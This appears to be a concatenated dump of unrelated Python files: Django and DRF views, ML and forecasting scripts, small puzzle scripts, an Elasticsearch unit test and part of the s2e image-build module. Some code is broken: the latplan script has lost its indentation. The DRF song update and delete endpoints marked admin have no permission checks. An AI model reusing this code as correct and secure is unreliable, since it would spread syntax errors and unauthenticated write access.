# return render_to_response("home.html" , contexto)
class Home(TemplateView):
    """Renders the static home page.

    NOTE(review): render_to_response bypasses TemplateView's template_name
    machinery and ignores the request context — confirm this is intentional.
    """
    def get(self, request , *args , **kwargs):
        return render_to_response('home.html')
class AddContact(CreateView):
    """Create-view for Contact; redirects to 'home' on success.

    NOTE(review): no `fields`/`form_class` declared — Django 1.8+ raises
    ImproperlyConfigured for a CreateView without one; confirm the Django
    version in use.
    """
    model = Contact
    success_url = reverse_lazy('home')
    # return render_to_response("home.html" , contexto)
class ListContact(ListView):
    """List-view over all Contact records."""
    model = Contact
|
5,179 | f1c6340880b52ba86856913f74c7d589d9b49f49 | #!/usr/bin/env python3
import warnings
import config
import numpy as np
from latplan.model import ActionAE, default_networks
from latplan.util import curry
from latplan.util.tuning import grid_search, nn_task
import keras.backend as K
import tensorflow as tf
float_formatter = lambda x: "%.3f" % x
np.set_printoptions(formatter={'float_kind':float_formatter})
################################################################
# default values
# Hyperparameter defaults handed to grid_search alongside the per-run
# `parameters` dict in __main__ — presumably the per-run dict overrides
# these keys; confirm against latplan.util.tuning.grid_search.
default_parameters = {
    'lr' : 0.0001,
    'batch_size' : 2000,
    'full_epoch' : 1000,
    'epoch' : 1000,
    'max_temperature' : 5.0,
    'min_temperature' : 0.1,
    'M' : 2,
}
if __name__ == '__main__':
import numpy.random as random
import sys
if len(sys.argv) == 1:
sys.exit("{} [directory]".format(sys.argv[0]))
directory = sys.argv[1]
directory_aae = "{}/_aae/".format(directory)
mode = sys.argv[2]
from latplan.util import get_ae_type
ae = default_networks[get_ae_type(directory)](directory).load()
if "hanoi" in ae.path:
data = np.loadtxt(ae.local("all_actions.csv"),dtype=np.int8)
else:
data = np.loadtxt(ae.local("actions.csv"),dtype=np.int8)
parameters = {
'N' :[1],
'M' :[128],
'layer' :[400],# 200,300,400,700,1000
'encoder_layers' : [2], # 0,2,3
'decoder_layers' : [2], # 0,1,3
'dropout' :[0.4], #[0.1,0.4],
# 'dropout_z' :[False],
'batch_size' :[2000],
'full_epoch' :[1000],
'epoch' :[1000],
'encoder_activation' :['relu'], # 'tanh'
'decoder_activation' :['relu'], # 'tanh',
# quick eval
'lr' :[0.001],
}
print(data.shape)
try:
if 'learn' in mode:
raise Exception('learn')
aae = ActionAE(directory_aae).load()
except:
aae,_,_ = grid_search(curry(nn_task, ActionAE, directory_aae,
data[:int(len(data)*0.9)], data[:int(len(data)*0.9)],
data[int(len(data)*0.9):], data[int(len(data)*0.9):],),
default_parameters,
parameters)
aae.save()
N = data.shape[1]//2
actions = aae.encode_action(data, batch_size=1000).round()
histogram = np.squeeze(actions.sum(axis=0,dtype=int))
all_labels = np.zeros((np.count_nonzero(histogram), actions.shape[1], actions.shape[2]), dtype=int)
for i, pos in enumerate(np.where(histogram > 0)[0]):
all_labels[i][0][pos] = 1
if 'plot' in mode:
aae.plot(data[:8], "aae_train.png")
aae.plot(data[int(len(data)*0.9):int(len(data)*0.9)+8], "aae_test.png")
aae.plot(data[:8], "aae_train_decoded.png", ae=ae)
aae.plot(data[int(len(data)*0.9):int(len(data)*0.9)+8], "aae_test_decoded.png", ae=ae)
transitions = aae.decode([np.repeat(data[:1,:N], len(all_labels), axis=0), all_labels])
aae.plot(transitions, "aae_all_actions_for_a_state.png", ae=ae)
from latplan.util.timer import Timer
# with Timer("loading csv..."):
# all_actions = np.loadtxt("{}/all_actions.csv".format(directory),dtype=np.int8)
# transitions = aae.decode([np.repeat(all_actions[:1,:N], len(all_labels), axis=0), all_labels])
suc = transitions[:,N:]
from latplan.util.plot import plot_grid, squarify
plot_grid([x for x in ae.decode_binary(suc)], w=8, path=aae.local("aae_all_actions_for_a_state_8x16.png"), verbose=True)
plot_grid([x for x in ae.decode_binary(suc)], w=16, path=aae.local("aae_all_actions_for_a_state_16x8.png"), verbose=True)
plot_grid(ae.decode_binary(data[:1,:N]), w=1, path=aae.local("aae_all_actions_for_a_state_state.png"), verbose=True)
if 'check' in mode:
from latplan.util.timer import Timer
with Timer("loading csv..."):
all_actions = np.loadtxt("{}/all_actions.csv".format(directory),dtype=np.int8)
with Timer("shuffling"):
random.shuffle(all_actions)
all_actions = all_actions[:10000]
count = 0
try:
pre_states = all_actions[:,:N]
suc_states = all_actions[:,N:]
pre_images = ae.decode_binary(pre_states,batch_size=1000)
suc_images = ae.decode_binary(suc_states,batch_size=1000)
import progressbar as pb
bar = pb.ProgressBar(
max_value=len(all_actions),
widgets=[
pb.Timer("Elap: %(elapsed) "),
pb.AbsoluteETA("Est: %(elapsed) "),
pb.Bar(),
])
for pre_state,suc_state,pre_image,suc_image in bar(zip(pre_states,suc_states,pre_images,suc_images)):
generated_transitions = aae.decode([
np.repeat([pre_state],128,axis=0),
all_labels,
],batch_size=1000)
generated_suc_states = generated_transitions[:,N:]
generated_suc_images = ae.decode_binary(generated_suc_states,batch_size=1000)
from latplan.util import bce
errors = bce(generated_suc_images, np.repeat([suc_image],128,axis=0), axis=(1,2))
min_error = np.amin(errors)
if min_error < 0.01:
count += 1
finally:
print({"count": count, "total":len(all_actions)})
actions = aae.encode_action(data, batch_size=1000)
actions_r = actions.round()
histogram = actions.sum(axis=0)
print(histogram)
histogram_r = actions_r.sum(axis=0,dtype=int)
print(histogram_r)
print (np.count_nonzero(histogram_r > 0))
"""* Summary:
Input: a subset of valid action pairs.
* Training:
* Evaluation:
If the number of actions are too large, they simply does not appear in the
training examples. This means those actions can be pruned, and you can lower the number of actions.
TODO:
verify all valid successors are generated, negative prior exploiting that fact
consider changing the input data: all successors are provided, closed world assumption
mearging action discriminator and state discriminator into one network
AD: use the minimum activation among the correct actions as a threshold
or use 1.0
AD: use action label as an additional input to discriminaotr (??)
AD: ensemble
"""
|
5,180 | 5a1c4cc572431f89709d20296d43e8d889e8c5b0 | Dict={0:0, 1:1}
def fibo(n):
    """Return the n-th Fibonacci number, memoised in the module-level Dict."""
    if n not in Dict:
        Dict[n] = fibo(n - 1) + fibo(n - 2)
    return Dict[n]
n = int(input("Enter the value of n:"))
print("Fibonacci(", n, ")= ", fibo(n))
# uncomment to take input from the user
nterms = int(input("How many terms? "))
# check if the number of terms is valid
if nterms <= 0:
    # BUG FIX: corrected the "Plese" typo in the user-facing message.
    print("Please enter a positive integer")
else:
    print("Fibonacci sequence:")
    # BUG FIX: a stray ``` after the colon on this line was a syntax error.
    for i in range(nterms):
        print(fibo(i), end=" , ")
|
5,181 | a4dfac7e15064d92c806a4e3f972f06e4dca6b11 | # maze = [0, 3, 0, 1, -3]
# Puzzle input: one jump offset per line.
with open('./day_5/input.txt') as f:
    maze = f.readlines()
# (the `with` block closes the file; the old bare `f.close` was a no-op
# attribute access, not a call, and redundant anyway)
maze = [int(line.strip()) for line in maze]
# I think I will just expand on the original functions
# from now on rather than separating part one from two
def escape_maze(maze):
    """Count the jumps needed to escape *maze* (AoC 2017 day 5, part two).

    Starting at index 0, each cell holds a jump offset. After each jump the
    cell just left is decremented if it held three or more, otherwise
    incremented. Escape happens when a jump lands outside the list.

    Note: mutates *maze* in place. Returns the number of steps taken.
    """
    end = len(maze) - 1
    step_counter = 0
    offset = 0
    while True:
        cur_index = offset
        offset = offset + maze[cur_index]
        # Part-two rule: offsets of three or more shrink; smaller ones grow.
        if maze[cur_index] >= 3:
            maze[cur_index] = maze[cur_index] - 1
        else:
            maze[cur_index] = maze[cur_index] + 1
        step_counter += 1
        # BUG FIX: also treat a jump before index 0 as an escape; the
        # original only checked the high end, so a negative offset would
        # silently wrap around via Python's negative indexing.
        if offset < 0 or offset > end:
            return step_counter
print(escape_maze(maze)) |
5,182 | 5c01b83634b7ae9bc691341d7432a4e59617444c | #!/usr/bin/python
# Classification (U)
"""Program: elasticsearchrepo_create_repo.py
Description: Unit testing of create_repo in
elastic_class.ElasticSearchRepo class.
Usage:
test/unit/elastic_class/elasticsearchrepo_create_repo.py
Arguments:
"""
# Libraries and Global Variables
# Standard
import sys
import os
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
# Third-party
import mock
# Local
sys.path.append(os.getcwd())
import elastic_class
import version
__version__ = version.__version__
class Elasticsearch(object):
    """Class: Elasticsearch

    Description:  Lightweight stand-in for elasticsearch.Elasticsearch used
        by the unit tests: records the constructor arguments and exposes a
        canned cluster-info payload.

    Methods:
        __init__

    """
    def __init__(self, host_list, port=9200):
        """Method: __init__

        Description:  Capture the connection arguments and seed the fake
            info_status response.

        Arguments:

        """
        self.hosts = host_list
        self.port = port
        self.info_status = dict(cluster_name="ClusterName",
                                name="servername")
class UnitTest(unittest.TestCase):
"""Class: UnitTest
Description: Class which is a representation of a unit testing.
Methods:
setUp
test_not_created_repo
test_not_detected_repo
test_missing_repo_name
test_no_repo_dir
test_no_repo_name
test_default
"""
def setUp(self):
"""Function: setUp
Description: Initialization for unit testing.
Arguments:
"""
self.host_list = ["host1", "host2"]
self.repo = "reponame"
self.repo2 = "reponame2"
self.repo3 = "reponame3"
self.els = Elasticsearch(self.host_list)
self.repo_dir = "/dir/path/dump2"
self.nodes_data = {"serverid1": {"name": "hostname1", "settings":
{"path": {"data": ["/dir/data1"],
"logs": ["/dir/logs1"]}}},
"serverid2": {"name": "hostname2", "settings":
{"path": {"data": ["/dir/data2"],
"logs": ["/dir/logs2"]}}}}
self.health_data = {"status": "green", "cluster_name": "ClusterName"}
self.dump = "/dir/path/dump"
self.repo_list = {"reponame": {"type": "dbdump", "settings":
{"location": self.dump}}}
self.repo_dict = {"reponame": {"type": "dbdump", "settings":
{"location": self.dump}}}
self.repo_dict2 = {"reponame": {"type": "dbdump", "settings":
{"location": self.dump}},
"reponame2": {"type": "dbdump", "settings":
{"location": "/dir/path/dump2"}}}
@mock.patch("elastic_class.create_snapshot_repo",
mock.Mock(return_value={"acknowledged": False}))
@mock.patch("elastic_class.ElasticSearch.update_status",
mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_not_created_repo(self, mock_es, mock_repo):
"""Function: test_not_created_repo
Description: Test with repository not created.
Arguments:
"""
mock_es.return_value = self.els
mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
repo_dir=self.repo_dir)
els.connect()
els.repo_name = None
self.assertEqual(
els.create_repo(self.repo3, self.repo_dir),
(True,
"ERROR: Repository creation failure: " +
" reponame3, /dir/path/dump2"))
@mock.patch("elastic_class.create_snapshot_repo",
mock.Mock(return_value={"acknowledged": True}))
@mock.patch("elastic_class.ElasticSearch.update_status",
mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_not_detected_repo(self, mock_es, mock_repo):
"""Function: test_not_detected_repo
Description: Test with repository not detected.
Arguments:
"""
mock_es.return_value = self.els
mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
repo_dir=self.repo_dir)
els.connect()
els.repo_name = None
self.assertEqual(
els.create_repo(self.repo3, self.repo_dir),
(True,
"ERROR: Repository not detected: reponame3, /dir/path/dump2"))
@mock.patch("elastic_class.create_snapshot_repo",
mock.Mock(return_value={"acknowledged": False}))
@mock.patch("elastic_class.ElasticSearch.update_status",
mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_missing_repo_name(self, mock_es, mock_repo):
"""Function: test_missing_repo_name
Description: Test with missing repo named.
Arguments:
"""
mock_es.return_value = self.els
mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
repo_dir=self.repo_dir)
els.connect()
els.repo = None
self.assertEqual(
els.create_repo(repo_dir=self.repo_dir),
(True,
"ERROR: Missing repo name or" +
" directory: 'None', '/dir/path/dump2'"))
@mock.patch("elastic_class.create_snapshot_repo",
mock.Mock(return_value={"acknowledged": True}))
@mock.patch("elastic_class.ElasticSearch.update_status",
mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_no_repo_dir(self, mock_es, mock_repo):
"""Function: test_no_repo_dir
Description: Test with no repo directory passed.
Arguments:
"""
mock_es.return_value = self.els
mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
repo_dir=self.repo_dir)
els.connect()
self.assertEqual(els.create_repo(self.repo), (False, None))
self.assertEqual(els.repo_dict, self.repo_dict2)
@mock.patch("elastic_class.create_snapshot_repo",
            mock.Mock(return_value={"acknowledged": True}))
@mock.patch("elastic_class.ElasticSearch.update_status",
            mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_no_repo_name(self, mock_es, mock_repo):
    """Function: test_no_repo_name

    Description: create_repo called with only repo_dir succeeds using the
        repo name stored on the instance (self.repo2 here).

    Arguments:
        mock_es -> mocked elasticsearch.Elasticsearch class.
        mock_repo -> mocked elastic_class.get_repo_list function.
    """
    mock_es.return_value = self.els
    mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
    els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo2,
                                          repo_dir=self.repo_dir)
    els.connect()
    self.assertEqual(els.create_repo(repo_dir=self.repo_dir),
                     (False, None))
    self.assertEqual(els.repo_dict, self.repo_dict2)
@mock.patch("elastic_class.create_snapshot_repo",
            mock.Mock(return_value={"acknowledged": True}))
@mock.patch("elastic_class.ElasticSearch.update_status",
            mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_default(self, mock_es, mock_repo):
    """Function: test_default

    Description: create_repo with an explicit repo name and directory
        succeeds and refreshes the repo dictionary.

    Arguments:
        mock_es -> mocked elasticsearch.Elasticsearch class.
        mock_repo -> mocked elastic_class.get_repo_list function.
    """
    mock_es.return_value = self.els
    mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
    els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
                                          repo_dir=self.repo_dir)
    els.connect()
    self.assertEqual(els.create_repo(self.repo2, self.repo_dir),
                     (False, None))
    self.assertEqual(els.repo_dict, self.repo_dict2)
if __name__ == "__main__":
    # Allow running this test module directly via the unittest CLI.
    unittest.main()
|
5,183 | ff53a549222b0d5e2fcb518c1e44b656c45ce76e | from rest_framework import status
from rest_framework.response import Response
from rest_framework.decorators import api_view, permission_classes
from rest_framework.permissions import IsAuthenticated
from playlist.models import Song, AccountSong, Genre, AccountGenre
from account.models import Account
from playlist.api.serializers import GenreSerializer, SongSerializer, AccountGenreSerializer
from rest_framework.generics import ListAPIView
# create a specific genre details by title
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def create_account_genre_view(request):
    """Link the authenticated account to an existing Genre named in the body.

    Returns 404 if no Genre has the given title, 201 with the serialized
    link on success, or 400 with validation errors.
    """
    genre_title = request.data.get('title', '0')
    try:
        genre = Genre.objects.get(title=genre_title)
    except Genre.DoesNotExist:
        return Response(status=status.HTTP_404_NOT_FOUND)
    payload = {'genre': genre.pk, 'account': request.user.pk}
    serializer = AccountGenreSerializer(data=payload)
    if not serializer.is_valid():
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
    serializer.save()
    return Response(serializer.data, status=status.HTTP_201_CREATED)
# Get a specific genre details by title
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def detail_genre_view(request):
    """Return the serialized Genre whose title is given in the request body.

    Responds 404 when the title does not match any Genre.
    """
    genre_title = request.data.get('title', '0')
    try:
        genre = Genre.objects.get(title=genre_title)
    except Genre.DoesNotExist:
        return Response(status=status.HTTP_404_NOT_FOUND)
    return Response(GenreSerializer(genre).data)
# post a new song
@api_view(['POST'])
#admin
def create_song_view(request):
    """Create a new Song from the posted payload (intended for admins)."""
    serializer = SongSerializer(data=request.data)
    if not serializer.is_valid():
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
    serializer.save()
    return Response(serializer.data, status=status.HTTP_201_CREATED)
# Get a specific song details by id
@api_view(['GET'])
def detail_song_view(request):
    """Return the serialized Song identified by 'id' in the request body."""
    song_id = request.data.get('id', '0')
    try:
        song = Song.objects.get(id=song_id)
    except Song.DoesNotExist:
        return Response(status=status.HTTP_404_NOT_FOUND)
    return Response(SongSerializer(song).data)
# update a specific song details by id
@api_view(['PUT'])
#admin
def update_song_view(request):
    """Update an existing Song (looked up by 'id') with the request payload.

    Responds 404 if the Song is missing, a success message on update,
    or 400 with validation errors.
    """
    song_id = request.data.get('id', '0')
    try:
        song = Song.objects.get(id=song_id)
    except Song.DoesNotExist:
        return Response(status=status.HTTP_404_NOT_FOUND)
    if request.method == "PUT":
        serializer = SongSerializer(song, data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(data={"success": "update successful"})
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# delete a specific song details by id
@api_view(['DELETE'])
#admin
def delete_song_view(request):
    """Delete the Song identified by 'id' in the request body.

    Responds 404 if the Song is missing, otherwise a success/failure message.
    """
    song_id = request.data.get('id', '0')
    try:
        song = Song.objects.get(id=song_id)
    except Song.DoesNotExist:
        return Response(status=status.HTTP_404_NOT_FOUND)
    if request.method == "DELETE":
        outcome = song.delete()
        if outcome:
            payload = {"success": "delete successful"}
        else:
            payload = {"failure": "delete failure"}
        return Response(data=payload)
# GET all genres
# GET all account genres
# DELETE all account genres
# GET all songs (by account genres)
# POST liked genres
# POST liked songs
# GET whatsapp link
# POST create playlist
|
5,184 | be279fe44b0d52c9d473e08d8b9c28d5b6386b45 | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
from dkfileutils.path import Path
def line_endings(fname):
    """Return the set of line terminators used in ``fname``.

    The result contains any of ``b'\\r'``, ``b'\\r\\n'`` and ``b'\\n'`` that
    terminate at least one line of the file.
    """
    # FIX: use a context manager so the file handle is always closed
    # (the original left the handle open).
    with open(fname, 'rb') as fp:
        _endings = {line[-2:] for line in fp.readlines()}
    res = set()
    for e in _endings:
        # Order matters: a b'\r\n' ending fails the b'\r' test (last byte
        # is b'\n'), so each branch matches exactly one terminator style.
        if e.endswith(b'\r'):
            res.add(b'\r')
        elif e.endswith(b'\r\n'):
            res.add(b'\r\n')
        elif e.endswith(b'\n'):
            res.add(b'\n')
    return res
def chomp(s):
    """Return *s* (bytes) without a single trailing line terminator, if any."""
    if s[-2:] == b'\r\n':
        return s[:-2]
    # Slicing (not indexing) keeps this safe on empty input.
    return s[:-1] if s[-1:] in (b'\r', b'\n') else s
def fix_line_endings(fname, eol=b'\n'):
    """Rewrite *fname* so that every line is terminated with ``eol``.

    Note: a terminator is appended to the last line even if the original
    file did not end with one.
    """
    # FIX: close the read handle via a context manager (the original
    # leaked it).
    with open(fname, 'rb') as fp:
        lines = [chomp(line) for line in fp.readlines()]
    with open(fname, 'wb') as fp:
        for line in lines:
            fp.write(line + eol)
def copy(ctx, source, dest, force=False):
    """Copy ``source`` to ``dest``, which can be a file or directory.

    Shells out through ``ctx.run`` ('copy' on win32, 'cp' elsewhere);
    ``force`` maps to '/Y' or '--force'. Both paths are normalized first.
    Returns ``dest``.
    """
    if source == dest:
        return dest  # nothing to do
    source = os.path.normcase(os.path.normpath(str(source)))
    dest = os.path.normcase(os.path.normpath(str(dest)))
    flags = ""
    if sys.platform == 'win32':
        if force:
            flags += " /Y"
        ctx.run('copy {flags} {source} {dest}'.format(**locals()))
    else:  # pragma: nocover
        if force:
            flags += " --force"
        ctx.run('cp {flags} {source} {dest}'.format(**locals()))
    return dest
def concat(ctx, dest, *sources, **kw):
    """Concatenate ``sources`` into ``dest``, creating its directory first.

    A newline is written after each source file and the result is
    normalized to a single line-ending style via ``fix_line_endings``.
    ``ctx`` and ``force`` are currently unused in the visible code path
    (kept for signature parity with the other task helpers).
    """
    force = kw.pop('force', False)  # noqa
    placement = Path(dest).dirname()
    placement.makedirs()
    with open(dest, 'w') as out:
        print("Opened:", dest, "for writing.")
        for s in sources:
            with open(s, 'r') as inp:
                print(" appending:", s)
                out.writelines(inp.readlines())
                out.write('\n')
    fix_line_endings(dest)
    return dest
|
5,185 | d78ac5188cad104ee1b3e214898c41f843b6d8c0 | from sklearn.preprocessing import RobustScaler
from statsmodels.tsa.arima.model import ARIMA
from sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error
from math import sqrt
import tensorflow as tf
import pandas as pd
import numpy as np
import os
import random
# Walk-forward ARIMA validation plus a 24-step forecast per region, run for
# each of the 5 random power-demand samples.
# set random seed
random.seed(1)
np.random.seed(1)
tf.random.set_random_seed(1)  # NOTE(review): TF1-style API — confirm TF version in use
random_sample_save_folder_path = '../c_data_processing/b_data_sampling/sampled_data/'
for i in range(1, 6):
    df = pd.read_csv(random_sample_save_folder_path + 'power_demand_sample%i.csv' % i, index_col=0)
    regions = df.columns
    result = pd.DataFrame(index=['rmse_test', 'r2_test', 'mae_test'])
    predict = pd.DataFrame()
    for region in regions:
        # data initialization: re-read so each region starts from pristine data
        RE_demand = pd.read_csv(random_sample_save_folder_path + 'power_demand_sample%i.csv' % i, index_col=0)
        RE_demand = pd.DataFrame(RE_demand[region])
        # train_test_split: 80/20 chronological split
        train_test_split = int(len(RE_demand) * 0.8)
        train, test = RE_demand[:train_test_split], RE_demand[train_test_split:]
        # data scaling (scaler fitted on the full series)
        scaler = RobustScaler()
        scaler = scaler.fit(RE_demand.values)
        train_scaled = scaler.transform(train)
        test_scaled = scaler.transform(test)
        # walk-forward validation: refit on history, forecast one step ahead
        history = [x for x in train_scaled]
        test_pred = []
        for j in range(len(test_scaled)):
            model = ARIMA(history, order=(3, 1, 1))  # setting (p, d, q) guide : https://www.youtube.com/watch?v=YQF5PDDI9jo&list=LL&index=5
            model_fit = model.fit()
            output = model_fit.forecast()
            yhat = output
            test_pred.append(yhat)
            # BUG FIX: append the j-th test observation to the history.
            # The original used test_scaled[i], indexing with the outer
            # sample counter (1..5), which fed the wrong observation into
            # every walk-forward step.
            obs = test_scaled[j]
            history.append(obs)
        test_pred = np.array(test_pred)
        test_pred = scaler.inverse_transform(test_pred)
        # model evaluation on the held-out period
        rmse = sqrt(mean_squared_error(test, test_pred))
        r2 = r2_score(test, test_pred)
        mae = mean_absolute_error(test, test_pred)
        metrics = [rmse, r2, mae]
        result['%s' % region] = metrics
        performance_path = './ARIMA/performance/'
        # data forecasting: 24 steps ahead from the final fitted model
        forecast = model_fit.forecast(steps=24)
        forecast = forecast.reshape(-1, 1)
        forecast = scaler.inverse_transform(forecast)
        # data concatenate: ['test', <test preds>, 'forecast', <future preds>]
        test = np.array(['test']).reshape(-1, 1)
        pred = np.array(['forecast']).reshape(-1, 1)
        forecast = np.concatenate([test, test_pred, pred, forecast])
        forecast = np.concatenate(forecast)
        predict['%s' % region] = forecast
        forecast_path = './ARIMA/forecast/'
    # persist per-sample metrics and forecasts
    if not os.path.exists(performance_path):
        os.makedirs(performance_path)
    result.to_csv(performance_path + 'ARIMA_sample%s_score.csv' % i)
    if not os.path.exists(forecast_path):
        os.makedirs(forecast_path)
    predict.to_csv(forecast_path + 'ARIMA_sample%s_forecast.csv' % i)
5,186 | e5921edef3d3c56a73f2674f483ea4d1f3577629 | """
Copyright (c) 2017 Cyberhaven
Copyright (c) 2017 Dependable Systems Laboratory, EPFL
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import glob
import grp
import logging
import os
import pwd
import re
import socket
import time
from threading import Thread
import psutil
from psutil import NoSuchProcess
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
import sh
from sh import ErrorReturnCode
from s2e_env import CONSTANTS
from s2e_env.command import EnvCommand, CommandError
from s2e_env.utils import repos
from s2e_env.utils.images import ImageDownloader, get_image_templates, get_app_templates, get_all_images, \
translate_image_name
logger = logging.getLogger('image_build')
def _get_user_groups(user_name):
"""
Get a list of groups for the user ``user_name``.
"""
groups = [g.gr_name for g in grp.getgrall() if user_name in g.gr_mem]
gid = pwd.getpwnam(user_name).pw_gid
groups.append(grp.getgrgid(gid).gr_name)
return groups
def _get_user_name():
"""
Get the current user.
"""
return pwd.getpwuid(os.getuid())[0]
def _user_belongs_to(group_name):
    """
    Check whether the current user is a member of ``group_name``.
    """
    return group_name in _get_user_groups(_get_user_name())
def _raise_group_error(group_name):
    """Abort with instructions for joining the required ``group_name`` group."""
    message = (f'You must belong to the {group_name} group in order to build '
               'images. Please run the following command, then logout '
               'and login:\n\n'
               f'\tsudo usermod -a -G {group_name} $(whoami)')
    raise CommandError(message)
def _check_groups_docker():
    """
    Ensure the current user is in the ``docker`` group, which is needed
    both to run S2E and to build S2E images.
    """
    if _user_belongs_to('docker'):
        return
    _raise_group_error('docker')
def _check_groups_kvm():
    """Being member of KVM is required only when using KVM to build images"""
    if _user_belongs_to('libvirtd') or _user_belongs_to('kvm'):
        return
    _raise_group_error('kvm')
def _check_virtualbox():
    """
    Check if VirtualBox is running. VirtualBox conflicts with S2E's
    requirement for KVM, so VirtualBox must *not* be running together
    with S2E. Raises CommandError if a VBoxHeadless process is found.
    """
    # Adapted from https://github.com/giampaolo/psutil/issues/132#issuecomment-44017679
    # to avoid race conditions
    for proc in psutil.process_iter():
        try:
            if proc.name() == 'VBoxHeadless':
                raise CommandError('S2E uses KVM to build images. VirtualBox '
                                   'is currently running, which is not '
                                   'compatible with KVM. Please close all '
                                   'VirtualBox VMs and try again.')
        except NoSuchProcess:
            # Process exited between enumeration and name() — ignore it.
            pass
def _check_vmware():
    """
    Check if VMWare is running. VMware conflicts with S2E's requirement
    for KVM, so VMWare must *not* be running together with S2E.
    Raises CommandError if a vmware-vmx process is found.
    """
    for proc in psutil.process_iter():
        try:
            if proc.name() == 'vmware-vmx':
                raise CommandError('S2E uses KVM to build images. VMware '
                                   'is currently running, which is not '
                                   'compatible with KVM. Please close all '
                                   'VMware VMs and try again.')
        except NoSuchProcess:
            # Process exited during iteration — ignore it.
            pass
def _check_kvm():
    """
    Verify that the KVM interface exists; libs2e requires it to
    communicate with QEMU.
    """
    kvm_device = os.path.join(os.sep, 'dev', 'kvm')
    if os.path.exists(kvm_device):
        return
    raise CommandError('KVM interface not found - check that /dev/kvm '
                       'exists. Alternatively, you can disable KVM (-n '
                       'option) or download pre-built images (-d option)')
def _check_vmlinux():
    """
    Check that /boot/vmlinux* files are readable. This is important for
    guestfish. Raises CommandError with a chmod hint when any kernel
    image cannot be opened.
    """
    try:
        for f in glob.glob(os.path.join(os.sep, 'boot', 'vmlinu*')):
            # Opening (and immediately closing) is enough to prove readability.
            with open(f, 'rb'):
                pass
    except IOError:
        # 'from None' hides the low-level IOError; the message is actionable.
        raise CommandError('Make sure that the kernels in /boot are readable. '
                           'This is required for guestfish. Please run the '
                           'following command:\n\n'
                           'sudo chmod ugo+r /boot/vmlinu*') from None
# pylint: disable=no-member
def _check_cow(image_dir):
    """
    Check that the file system that stores guest images supports
    copy-on-write. Probes by creating a scratch file and cloning it with
    ``cp --reflink=always``; returns True on success, False (after
    logging an upgrade hint) otherwise. Scratch files are always removed.
    """
    try:
        src = f'{image_dir}/.cowcheck'
        dst = f'{image_dir}/.cowcheck1'
        sh.touch(src)
        # Fails on file systems without reflink support.
        sh.cp('--reflink=always', src, dst)
        return True
    except Exception:
        warn_msg = f"""
        Copy-on-write check failed.
        The file system where images are stored ({image_dir}) does not support copy-on-write.
        It is recommended to use an XFS or BTRFS file system with copy-on-write enabled as a storage
        location for S2E images, as this can save up to 60% of disk space. The building process checkpoints
        intermediate build steps with cp --reflink=auto to make use of copy-on-write if it is available.
        How to upgrade:
        1. Create an XFS or BTRFS partition large enough to store the images that you need (~300 GB for all images).
           Make sure you use reflink=1 to enable copy-on-write when running mkfs.xfs.
        2. Create a directory for guest images on that partition (e.g., /mnt/disk1/images)
        3. Delete the "images" folder in your S2E environment
        4. Create in your S2E environment a symbolic link called "images" to the directory you created in step 2
        """
        # Strip the 8-space literal indentation before logging.
        logger.warning(re.sub(r'^ {8}', '', warn_msg, flags=re.MULTILINE))
        return False
    finally:
        sh.rm('-f', src)
        sh.rm('-f', dst)
def _raise_invalid_image(image_name):
    """Abort because ``image_name`` does not match any known image."""
    message = (f'Invalid image name: {image_name}. Run ``s2e image_build`` '
